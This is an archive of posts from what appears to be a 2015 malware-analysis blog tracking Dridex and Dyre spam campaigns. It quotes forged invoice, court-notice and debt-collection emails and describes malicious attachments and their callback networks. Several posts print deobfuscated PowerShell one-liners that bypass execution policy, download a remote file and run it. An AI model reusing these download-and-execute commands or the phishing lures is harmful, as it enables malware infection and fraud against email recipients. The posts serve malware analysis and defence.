Wednesday, 25 March 2015

Malware spam: "Invoice ID:12ab34" / "123"

This terse spam has a malicious attachment:
From:    Gerry Carpenter
Date:    25 March 2015 at 12:58
Subject:    Invoice ID:34bf33

There is an Excel attachment with the same semi-random reference number as the subject (in the sample I saw it was 34bf33.xls) which currently has zero detections. Unlike most recent document-based attacks, this does not contain a macro, but instead has an embedded OLE object that will run a VBscript if clicked, the spreadsheet itself is designed to get the victim to click-and-run that object.

Automated analysis doesn't show very much, but it does show the screenshots [1] [2]. I haven't been able to extract the VBscript in a neat enough format, but what did interest me is this novel obfuscation [pastebin] which actually just executes this:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; Start-Process %TEMP%\JIOiodfhioIH.exe;
Despite all the mucking about with expanding a CAB file, the downloaded file is actually an EXE file all along so nothing is done to it. This file has a detection rate of 7/56, and the Payload Security report shows it communicating with the following IPs: (MWTV, Latvia) (DorukNet, Turkey) (, Japan)

The payload is most likely Dridex.

Recommended blocklist:


Malware spam: "James Dudley []" / "Payment 1142"

This spam email is yet another forgery pretending to be from a wholly legitimate company. It is one of a series of emails spoofing Cambridgeshire firms, and it comes with a malicious attachment.

From:    James Dudley []
Date:    25 March 2015 at 09:38
Subject:    Payment 1142

Payment sheet attached.


T    01353 624023
F    01353 624043

Hitec Ltd
23 Regal Drive

This message has been scanned for viruses and malicious content by Green Duck SpamLab 
I have only seen a single sample of this, with an attachment Payment 1142.doc which has a VirusTotal detection rate of 5/57. It contains this malicious macro [pastebin] which attempts to download a component from:

..which is then saved as %TEMP%\sollken1.2.8.exe, this has a detection rate of 12/57. Automated analysis of this binary is pending, but is so far inconclusive.

Incidentally, the macro contains this snippet:

' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' (Last update: 2015-03-10T18:38+09:00)

All that means is that this Ken Senoo created and freely licensed a Visual Basic module that the bad guys are using. It does not mean that they have anything at all to do with this malware attack.


UPDATE: this interesting new tool from Payload Security gives some insight as to what the malware does. In particular, it phones home to: (Steadfast Networks, US) (OneGbits, Lithuania) (Orange S.A., France) (Tata Indicom, India) (Digital Networks aka DINETHOSTING, Russia)

Recommended blocklist:

Tuesday, 24 March 2015

Malware spam: "Notice to Appear" / "Notice to appear in Court #0000310657"

These two emails come with a malicious attachment:

From:    County Court []
Date:    24 March 2015 at 16:45
Subject:    AERO, Notice to Appear

This is to inform you to appear in the Court on the March 31 for your case hearing.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can review complete details of the Court Notice in the attachment.

Yours faithfully,
Lester Hicks,
Court Secretary.


From:    District Court []
Date:    24 March 2015 at 16:44
Subject:    AERO, Notice to appear in Court #0000310657

Dear Aero,

This is to inform you to appear in the Court on the March 28 for your case hearing.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: If you do not come, the case will be heard in your absence.

You can review complete details of the Court Notice in the attachment.

Cody Bowman,
District Clerk.

In these two case the attachments were named and containing the malicious scripts Court_Notification_0000310657.doc.js [VirusTotal 7/57] [pastebin] [deobfuscated] and Notice_to_Appear_000283436.doc.js [VirusTotal 6/57] [pastebin] [deobfuscated] respectively.

These scripts attempt to download malicious code from the following sites:

Details in the download locations vary, but are in the format:

This leads to a randomly-named file with a GIF extension which is actually one of two malicious EXE files, with detection rates of 6/57 and 4/56. One of those produces a valid Malwr report, the other smaller EXE doesn't seem to do anything.

The executable that seems to do something POSTs to a Turkish server at (Radore Veri Merkezi Hizmetleri A.S.). Various Malwr reports [1] [2] [3] [4] [5] [6] indicate badness on at least the following IPs:

I would suggest blocking at least those IPs, or perhaps or if you don't mind blocking access to a few legitimate Turkish sites you could perhaps block

I am not 100% certain of the payload, however some servers in that cluster have been fingered for serving the Trapwot fake anti-virus software.


Malware spam: "Mary Watkins []" / "Invoice"

This spam email message does not come from Ely Design Group, but is in fact just a simple forgery. Ely Design Group's systems have not been compromised in any way. This email comes with a malicous attachment.

From:    Mary Watkins []
Date:    24 March 2015 at 07:23
Subject:    Invoice


As promised!

Mary Watkins
Office Manager
Ely Design Group
Attached is a Word document named S22C-6e15031710060.doc which has a low detection rate of 2/57 which contains this malicious macro [pastebin] which then downloads a component from the following location:

The file is saved as %TEMP%\PALmisc2.5.2.exe and has a VirusTotal detection rate of 6/57.

Automated analysis tools [1] [2] [3] [4] [5] indicate that the binary crashes in those test environments. although whether or not it will work on a live PC is another matter. The payload (if it works) is almost definitely the Dridex banking trojan.

Friday, 20 March 2015

Something evil on and

I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on (root SA, Luxembourg) [VT report] being reached via (AirISP, Russia) [VT report].

Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:

For practical purposes though I recommend you block traffic to the IPs rather than the domains.

Recommended blocklist:

These following nearby IPs have also been distributing badness. I recommend you block these too:

Thursday, 19 March 2015

Malware spam: "Invoice ID:987654321 in attachment." from random senders

This spam has no body text and a randomly-generated sender name and invoice ID number. Sample subjects include:

Invoice ID:07dda8035 in attachment.
Invoice ID:09bf252 in attachment.
Invoice ID:108df399 in attachment.
Invoice ID:11847972 in attachment.
Invoice ID:156a35519 in attachment.
Invoice ID:16bb539 in attachment.
Invoice ID:16de0833 in attachment.
Invoice ID:17ff9887 in attachment.
Invoice ID:19b5b30 in attachment.

Sample senders:

Angelia Oliver
Annette Hunter
Austin Bennett
Belinda Cameron
Brittney Dixon
Buster Nolan
Candace Bowers
Christian Kemp
Clarissa Gentry
Cruz Mcintosh
Doug Haney
Dylan Poole
Erwin Hale
Gordon Downs
Hallie Neal
Oscar Bradshaw
Reyna Carver
Rosalie Acevedo
Sid Alston
Sophia Scott
Tanner Puckett
Tia Kline
Trudy Hensley
Valerie Delaney
Ivy Stokes
Jeanie Frye
Karin Frank
Kayla Travis
Mai Rowland
Marilyn Fleming
Minerva Glover

The Word document contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the same as the one used in this attack.

Malware spam: "Aspiring Solicitors Debt Collection" has mystery XML attachment

This spam has a malicious attachment.

Date:    19 March 2015 at 12:52
Subject:    Aspiring Solicitors Debt Collection

Aspiring Solicitors

Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance:       2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.

You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.

Court Fees  GBP 245.00

Solicitors Costs  GBP 750.00

Cheques or Postal Orders should be  made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.

Yours faithfully,
Shawn Ballard
Aspiring Solicitors

Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
United Kingdom
Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indication are that this can run even with macros disabled. Each attachment has a unique MD5.

Analysis is currently pending, this appears to have several new techniques to avoid detection. According to this Twitter conversation one version attempts to download a binary from although this is currently timing out for me. For security analysts, a sample of the XML file can be found here.

IMPORTANT: if you have opened this document in Word then there is a good chance that you are infected. I would recommend that you shut down any machine that has opened this. Anti-virus detections are currently very poor, but vendors may have signature available soon, I would wait 24 hours before attempting to disinfect any infected machine. Dridex collects banking passwords, so it is important that machines are not used for financial transactions.


This particular attack uses some novel features. Opening the Word document reveals what appears to be an embedded XLS file:

There's some interesting metadata.. created by "Dredex" of "Ph0enix Team", then modified by "ПРроываААА".

In the typical attack scenario, opening the embedded file will force the macro to run. In this case, I used LibreOffice on a Linux box which does not support VBA. This revealed the malicious code, which looks like this.

A bit of copy-and-pasting reveals nothing more sophisticated than some Base 64 encoded text that attempts to run one of the following commands:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
FYI, those IPs are allocated as follows: (Servachok Ltd, Russia) (Sobis OOO, Russia) (Eximius LLC, Russia) (OVH, France / Bitweb LLC, Russia)

"shake.exe" has a VirusTotal detection rate of 3/57. Between that VirusTotal report and this Malwr report we can see the malware attempting to connect to: (Digital Networks aka DINETHOSTING, Russia) (OneGbits, Lithuania) (KPN Zakelijk Internet, Netherlands)

Further analysis is pending.

Recommended blocklist:

Malware spam: "" / "Your Sales Order"

This spam run pretends to come from Marflow Engineering but it doesn't, instead it is a simple forgery. Marflow are not sending out this email, nor have their systems been compromised in any way.

Date:    19 March 2015 at 09:13
Subject:    Your Sales Order

Your order acknowledgment is attached.

Please check carefully and advise us of any issues.

Best regards

Attached is a file 611866.xls which appears to come in at least three different versions. But due to an error in the way the spam has been created, the attachment is actually corrupt and (depending on your version of Excel) attempting to open it gives this error:

The file you are trying to open, '611866.xls', is in a different format than specified by the file extension. Verify that the file is not corrupted and is from a trusted source before opening the file. Do you want to open the file now?
Clicking OK loads up what looks like gobbledegook.

If you see this, then you have had a lucky escape because the attachment is in the wrong format and is Base 64 encoded. If you manually run a Base 64 decoder against it then you end up with a malicious XLS file, in one of three different flavours with low detection rates [1] [2] [3] which in turn each contain a slightly different malicious macro [1] [2] [3] which then attempt to download from the following locations:

This is saved in the %TEMP% folder under the filenames pirit86.exe, tikapom64.exe and Trekaldo51.exe (although the binary is the same in each case). This malicious binary has a detection rate of just 2/57 and according to the Malwr report, it phone home to the following IPs: (Pirix, Russia) (OMC Computers & Communications, Israel) (Gamma Telecom, UK) (University of Cambridge, UK) (Deniz Toprak, Turkey / B2 Net Solutions, US) (DAEMINCUSTOM, Korea) (Aqua Networks Ltd, Germany)

It also drops another version of the downloader, edg1.exe which has a detection rate of 1/56 and a DLL with a detection rate of also of 1/57. The payload is the Dridex banking trojan.

Recommended blocklist:

Wednesday, 18 March 2015

Malware spam: "JP Morgan Access []" / "FW: Customer account docs"

This fake financial spam comes with a malicious attachment.

From:    JP Morgan Access []
Date:    18 March 2015 at 17:49
Subject:    FW: Customer account docs

JP Morgan

We have received the following documents regarding your account, if you would like to confirm the changes please check / view the documents please click here.

Carrie Tolstedt
Carrie L. Tolstedt
Senior Executive Vice President
Community Banking
J.P. Morgan Treasury and Securities Services

This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.

As it happens, Carrie L Tolstedt is a real executive... at Wells Fargo. The lady in the picture is another Wells Fargo employee entirely.

But anyway, this is a simple forgery containing a link to a file at Cubby which downloads as and contains a malicious file Documents_JP3922PV8.exe which has a icon to make it look like an Adobe acrobat file.

The executable has a low VirusTotal detection rate of 3/57.  Various automated analysis tools [1] [2] [3] [4] show the malware downloading additional components from:

It then attempts to POST data to an IP at (Vsevnet Ltd. Russia) which is a critical IP to block if you want to protect yourself against this type of Upatre / Dyre attack.

The Malwr report also shows that amongst other things it downloads an executable lwxzqrk36.exe which has a detection rate of just 2/57. That Malwr report also shows that it downloads and pops up a PDF about drone strikes.

Presumably this PDF pops up to make the victim think that they have been duped into opening some politically-themed spam. Instead, they have actually installed the Dyre banking trojan.. in other words, the victim may well think that it is nothing serious when it really is.

The download locations for this Upatre/Dyre combination change all the time, but the IP address of  has been around for a little while. Also, it is a characteristic of this malware that it calls out to to determine the client IP address.. monitoring for traffic going to that location can be a useful indicator of infection.


Malware spam: "Your online Submission"

This spam leads to a malicious ZIP file hosted either on Dropbox or Cubby.

Date:    18 March 2015 at 13:19
Subject:    Your online Submission

Electronic Submission Gateway

Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.

To view/download your form to the Government Gateway please visit

This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail. - the best place to find government services and information - Opens in new window

The best place to find government services and information
The link leads to an archive file which in turn contains a malicious binary Avis_De_Paiement.scr which has a VirusTotal detection rate of 16/57. ThreatExpert and Comodo CAMAS report that it downloads components from the following locations:

My sources indicate that this most likely phones home to (Vsevnet Ltd. Russia) which is a known bad IP that I recommend blocking. The payload appears to be the Upatre downloader leading to the Dyre banking trojan.

Malware spam: "December unpaid invoice notification"

This spam comes with no body text, but does come with a malicious attachment.

From:    Korey Mack
Date:    18 March 2015 at 11:04
Subject:    December unpaid invoice notification
So far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;
Although the EXE file from (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.

This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs: (Call U Communications, Palestine) (Digital Networks CJSC aka DINETHOSTING, Russia) (OVH, Ireland) (OVH, Latvia) (Reliance Communication, India) (Private Layer INC, Switzerland)

Recommended blocklist:

Malware spam: "Confirmation of Booking" / "NWN Media Ltd" / "Della Richardson"

This spam is not from NWN Media Ltd but is instead a simple forgery sent out to random email addresses with a malicious attachment. NWN Media are not responsible for this spam, nor have their systems been compromised.

From: []
Date:    18 March 2015 at 08:34
Subject:    Confirmation of Booking

This booking confirmation forms a binding contract between yourselves and NWN Media Ltd.
If you do not agree with any of the details above then please contact the named sales representative on the above number immediately.

Yours sincerely,

NWN Media Ltd
Attached is a file NWN Confirmation Letter.doc which I have so far seen in two different versions, both with low detection rates [1] [2] which contain slightly different malicious macros [1] [2] which then go and download a malicious binary from one of the following locations:

These are saved as %TEMP%\zakilom86.exe and %TEMP%\Pikadlo64.exe respectively. The binaries are actually identical and have a VirusTotal detection rate of 5/57. According to the Malwr report this binary attempts to communicate with the following IPs: (Relink Ltd, Russaia) (Selectel Ltd, Russia) (OVH, France) (Clodo-Cloud / IT House, Russia) (Digital Networks CSJC aka DINETHOSTING / Russia)

It then drops what appears to be another version of itself called edg1.exe onto the target system [VT 2/55] along with a malicious Dridex DLL [VT 3/55]

Recommended blocklist:

Saturday, 14 March 2015

Quttera fails and spews false positives everywhere

By chance, I found out that my blog had been blacklisted by Quttera. No big deal, because it happens from time-to-time due to the nature of the content on the site. But I discovered that it isn't just my blog, but Quttera also block industry-leading sites such as Cisco, VMWare, Sophos, MITRE, AVG and Phishtank.

For example, at the time of writing the following domains are all blacklisted by Quttera (clicking the link shows the current blacklisting status):

Cisco's blacklisting entry looks like this:

Now, you can ask Quttera to unblacklist your site for free by raising a ticket but the most prominent link leads to a paid service for £60/year. Hmmm.

I don't think that I will rush to subscribe to that. Obviously, something is seriously wrong with the algorithm in use, some of these sites should obviously be whitelisted. Quttera also doesn't understand the different between a malicious domain or IP being mentioned and such a site being linked to or injected into a site.

I guess there are many, many more domains that are in a similar situation. Perhaps you might want to check your own web properties and share your findings in the comments?

Friday, 13 March 2015

Malware spam: "Invoice (13\03\2015) for payment to COMPANY NAME"

There is a series of malware spams in progress in the following format:

Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC

Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run yesterday and one new one with zero detections which contains this malicious macro, which downloads another component from:

This is saved as %TEMP%\GHjkdfg.exe - incidentally, this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53 and the Malwr report shows it phoning home to which is also in the same network neighbourhood.

The binary also drops a malicious Dridex DLL with a detection rate of 5/56. This is the same DLL as used in this spam run earlier today.

Recommended blocklist:

Malware spam: "" / "Invoice: 2262004"

This fake Penta Foods spam run is another variant of this and it comes with a malicious attachment. Penta Foods are not sending this email, instead it is a simple forgery.

Date:    13 March 2015 at 07:50
Subject:    Invoice: 2262004

Please find attached invoice :  2262004
  Any queries please contact us.

Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.

Attached is a Word document R-1179776.doc which actually comes in two version, both with zero detection rates, contains one of two malicious macros [1] [2] which then download a component from the following locations:

This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to: (Clodo-Cloud / IT House, Russia)

My sources also indicate that it phones home to: (Webagentur, Austria) (iomart / RapidSwitch, UK)

According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.

Recommended blocklist: